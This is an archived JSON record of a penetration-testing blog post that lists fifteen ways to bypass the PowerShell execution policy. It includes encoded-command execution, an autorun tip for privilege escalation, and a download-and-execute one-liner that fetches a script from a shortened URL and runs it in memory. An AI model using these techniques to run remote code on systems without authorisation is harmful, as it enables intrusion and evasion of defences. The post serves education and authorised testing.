{
	"id": "e23eb8f4-25ac-4f1d-9ce4-ffdcaa12e3f9",
	"created_at": "2026-04-06T01:29:55.229209Z",
	"updated_at": "2026-04-10T13:12:05.277227Z",
	"deleted_at": null,
	"sha1_hash": "90fc941ace355851eb60c813be1e689e23d20af5",
	"title": "15 Ways to Bypass the PowerShell Execution Policy",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 321459,
	"plain_text": "15 Ways to Bypass the PowerShell Execution Policy\r\nBy Scott Sutherland\r\nPublished: 2022-12-16 · Archived: 2026-04-06 00:42:12 UTC\r\nBy default PowerShell is configured to prevent the execution of PowerShell scripts on Windows systems. This can\r\nbe a hurdle for penetration testers, sysadmins, and developers, but it doesn’t have to be. In this blog I’ll cover 15\r\nways to bypass the PowerShell execution policy without having local administrator rights on the system. I’m sure\r\nthere are many techniques that I’ve missed (or simply don’t know about), but hopefully this cheat sheet will offer\r\na good start for those who need it.\r\nThe PowerShell execution policy is the setting that determines which type of PowerShell scripts (if any) can be\r\nrun on the system. By default it is set to “Restricted“, which basically means none. However, it’s important to\r\nunderstand that the setting was never meant to be a security control. Instead, it was intended to prevent\r\nadministrators from shooting themselves in the foot. That’s why there are so many options for working around it.\r\nIncluding a few that Microsoft has provided. For more information on the execution policy settings and other\r\ndefault security controls in PowerShell I suggest reading Carlos Perez’s blog. He provides a nice overview.\r\nWhy Would I Want to Bypass the Execution Policy?\r\nAutomation seems to be one of the more common responses I hear from people, but below are a few other reasons\r\nPowerShell has become so popular with administrators, pentesters, and hackers. 
PowerShell is:\r\nNative to Windows\r\nAble to call the Windows API\r\nAble to run commands without writing to the disk\r\nAble to avoid detection by Anti-virus\r\nAlready flagged as “trusted” by most application white list solutions\r\nA medium used to write many open source pentest toolkits\r\nHow to View the Execution Policy\r\nBefore being able to use all of the wonderful features PowerShell has to offer, attackers may have to bypass the\r\n“Restricted” execution policy. You can take a look at the current configuration with the “Get-ExecutionPolicy”\r\nPowerShell command. If you’re looking at the setting for the first time it’s likely set to “Restricted” as shown\r\nbelow.\r\nPS C:\u003e Get-ExecutionPolicy\r\nhttps://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/\r\nPage 1 of 10\n\nIt’s also worth noting that the execution policy can be set at different levels on the system. To view a list of them\r\nuse the command below. For more information you can check out Microsoft’s “Set-ExecutionPolicy” page here.\r\nGet-ExecutionPolicy -List | Format-Table -AutoSize\r\nLab Setup Notes\r\nIn the examples below I will use a script named runme.ps1 that contains the following PowerShell command to\r\nwrite a message to the console:\r\nWrite-Host \"My voice is my passport, verify me.\"\r\nWhen I attempt to execute it on a system configured with the default execution policy I get the following error:\r\nIf your current policy is too open and you want to make it more restrictive to test the techniques below, then run\r\nthe command “Set-ExecutionPolicy Restricted” from an administrator PowerShell console. Ok – enough of my\r\nbabbling – below are 15 ways to bypass the PowerShell execution policy restrictions.\r\nBypassing the PowerShell Execution Policy\r\n1. 
Paste the Script into an Interactive PowerShell Console\r\nCopy and paste your PowerShell script into an interactive console as shown below. However, keep in mind that\r\nyou will be limited by your current user’s privileges. This is the most basic example and can be handy for running\r\nquick scripts when you have an interactive console. Also, this technique does not result in a configuration change\r\nor require writing to disk.\r\n2. Echo the Script and Pipe it to PowerShell Standard In\r\nSimply ECHO your script into PowerShell standard input. This technique does not result in a configuration\r\nchange or require writing to disk.\r\nEcho Write-Host \"My voice is my passport, verify me.\" | PowerShell.exe -noprofile -\r\n3. Read Script from a File and Pipe to PowerShell Standard In\r\nUse the Windows “type” command or PowerShell “Get-Content” command to read your script from the disk and\r\npipe it into PowerShell standard input. This technique does not result in a configuration change, but does require\r\nwriting your script to disk. However, you could read it from a network share if you’re trying to avoid writing to\r\nthe disk.\r\nExample 1: Get-Content PowerShell command\r\nGet-Content .\\runme.ps1 | PowerShell.exe -noprofile -\r\nExample 2: Type command\r\nTYPE .\\runme.ps1 | PowerShell.exe -noprofile -\r\n4. Download Script from URL and Execute with Invoke Expression\r\nThis technique can be used to download a PowerShell script from the internet and execute it without having to\r\nwrite to disk. It also doesn’t result in any configuration changes. I have seen it used in many creative ways, but\r\nmost recently saw it being referenced in a nice PowerSploit blog by Matt Graeber.\r\npowershell -nop -c \"iex(New-Object Net.WebClient).DownloadString('https://bit.ly/1kEgbuH')\"\r\n5. 
Use the Command Switch\r\nThis technique is very similar to executing a script via copy and paste, but it can be done without the interactive\r\nconsole. It’s nice for simple script execution, but more complex scripts usually end up with parsing errors. This\r\ntechnique does not result in a configuration change or require writing to disk.\r\nExample 1: Full command\r\nPowershell -command \"Write-Host 'My voice is my passport, verify me.'\"\r\nExample 2: Short command\r\nPowershell -c \"Write-Host 'My voice is my passport, verify me.'\"\r\nIt may also be worth noting that you can place these types of PowerShell commands into batch files and place\r\nthem into autorun locations (like the all users startup folder) to help during privilege escalation.\r\n6. Use the EncodedCommand Switch\r\nThis is very similar to the “Command” switch, but all scripts are provided as a Unicode/base64 encoded string.\r\nEncoding your script in this way helps to avoid all those nasty parsing errors that you run into when using the\r\n“Command” switch. This technique does not result in a configuration change or require writing to disk. The\r\nsample below was taken from Posh-SecMod. The same toolkit includes a nice little compression method for\r\nreducing the size of the encoded commands if they start getting too long.\r\nExample 1: Full command\r\n$command = \"Write-Host 'My voice is my passport, verify me.'\"\r\n$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)\r\n$encodedCommand = [Convert]::ToBase64String($bytes)\r\npowershell.exe -EncodedCommand $encodedCommand\r\nExample 2: Short command using encoded string\r\npowershell.exe -Enc VwByAGkAdABlAC0ASABvAHMAdAAgACcATQB5ACAAdgBvAGkAYwBlACAAaQBzACAAbQB5ACAAcABhAHMAc\r\n7. 
Use the Invoke-Command Command\r\nThis is a fun option that I came across on the Obscuresec blog. It’s typically executed through an interactive\r\nPowerShell console or one liner using the “Command” switch, but the cool thing is that it can be used to execute\r\ncommands against remote systems where PowerShell remoting has been enabled. This technique does not result in\r\na configuration change or require writing to disk.\r\ninvoke-command -scriptblock {Write-Host \"My voice is my passport, verify me.\"}\r\nBased on the Obscuresec blog, the command below can also be used to grab the execution policy from a remote\r\ncomputer and apply it to the local computer.\r\ninvoke-command -computername Server01 -scriptblock {get-executionpolicy} | set-executionpolicy -force\r\n8. Use the Invoke-Expression Command\r\nThis is another one that’s typically executed through an interactive PowerShell console or one liner using the\r\n“Command” switch. This technique does not result in a configuration change or require writing to disk. Below\r\nI’ve listed a few common ways to use Invoke-Expression to bypass the execution policy.\r\nExample 1: Full command using Get-Content\r\nGet-Content .\\runme.ps1 | Invoke-Expression\r\nExample 2: Short command using Get-Content\r\nGC .\\runme.ps1 | iex\r\n9. Use the “Bypass” Execution Policy Flag\r\nThis is a nice flag added by Microsoft that will bypass the execution policy when you’re executing scripts from a\r\nfile. When this flag is used Microsoft states that “Nothing is blocked and there are no warnings or prompts”. This\r\ntechnique does not result in a configuration change or require writing to disk.\r\nPowerShell.exe -ExecutionPolicy Bypass -File .\\runme.ps1\r\n10. Use the “Unrestricted” Execution Policy Flag\r\nThis is similar to the “Bypass” flag. 
However, when this flag is used Microsoft states that it “Loads all configuration\r\nfiles and runs all scripts. If you run an unsigned script that was downloaded from the Internet, you are prompted\r\nfor permission before it runs.” This technique does not result in a configuration change or require writing to disk.\r\nPowerShell.exe -ExecutionPolicy UnRestricted -File .\\runme.ps1\r\n11. Use the “RemoteSigned” Execution Policy Flag\r\nCreate your script then follow the tutorial written by Carlos Perez to sign it. Finally, run it using the command\r\nbelow:\r\nPowerShell.exe -ExecutionPolicy RemoteSigned -File .\\runme.ps1\r\n12. Disable ExecutionPolicy by Swapping out the AuthorizationManager\r\nThis is one of the more creative approaches. The function below can be executed via an interactive PowerShell\r\nconsole or by using the “command” switch. Once the function is called it will swap out the\r\n“AuthorizationManager” with null. As a result, the execution policy is essentially set to unrestricted for the\r\nremainder of the session. This technique does not result in a persistent configuration change or require writing to\r\ndisk. However, the change will be applied for the duration of the session.\r\nfunction Disable-ExecutionPolicy {($ctx = $executioncontext.gettype().getfield(\"_context\",\"nonpublic\r\nDisable-ExecutionPolicy .\\runme.ps1\r\n13. Set the ExecutionPolicy for the Process Scope\r\nAs we saw in the introduction, the execution policy can be applied at many levels. This includes the process which\r\nyou have control over. Using this technique the execution policy can be set to unrestricted for the duration of your\r\nsession. Also, it does not result in a configuration change, or require writing to the disk.\r\nSet-ExecutionPolicy Bypass -Scope Process\r\n14. 
Set the ExecutionPolicy for the CurrentUser Scope via Command\r\nThis option is similar to the process scope, but applies the setting to the current user’s environment persistently by\r\nmodifying a registry key. Also, it does not result in a configuration change, or require writing to the disk.\r\nSet-Executionpolicy -Scope CurrentUser -ExecutionPolicy UnRestricted\r\n15. Set the ExecutionPolicy for the CurrentUser Scope via the Registry\r\nIn this example I’ve shown how to change the execution policy for the current user’s environment persistently by\r\nmodifying a registry key directly.\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell\r\nWrap Up Summary\r\nI think the theme here is that the execution policy doesn’t have to be a hurdle for developers, admins,\r\nor penetration testing. Microsoft never intended it to be a security control. Which is why there are so many options\r\nfor bypassing it. Microsoft was nice enough to provide some native options and the security community has also\r\ncome up with some really fun tricks. Thanks to all of those people who have contributed through blogs and\r\npresentations. To the rest, good luck in all your PowerShell adventures and don’t forget to hack responsibly. 😉\r\nLooking for a strategic partner to critically test your Windows systems? 
Explore NetSPI’s network penetration\r\ntesting services.\r\nReferences\r\nhttps://obscuresecurity.blogspot.com/2011/08/powershell-executionpolicy.html\r\nhttps://technet.microsoft.com/en-us/library/hh849694.aspx\r\nhttps://technet.microsoft.com/en-us/library/hh849812.aspx\r\nhttps://technet.microsoft.com/en-us/library/hh849893.aspx\r\nhttps://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html\r\nhttps://www.hanselman.com/blog/SigningPowerShellScripts.aspx\r\nhttps://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html\r\nSource: https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/"
	],
	"report_names": [
		"15-ways-to-bypass-the-powershell-execution-policy"
	],
	"threat_actors": [],
	"ts_created_at": 1775438995,
	"ts_updated_at": 1775826725,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/90fc941ace355851eb60c813be1e689e23d20af5.pdf",
		"text": "https://archive.orkl.eu/90fc941ace355851eb60c813be1e689e23d20af5.txt",
		"img": "https://archive.orkl.eu/90fc941ace355851eb60c813be1e689e23d20af5.jpg"
	}
}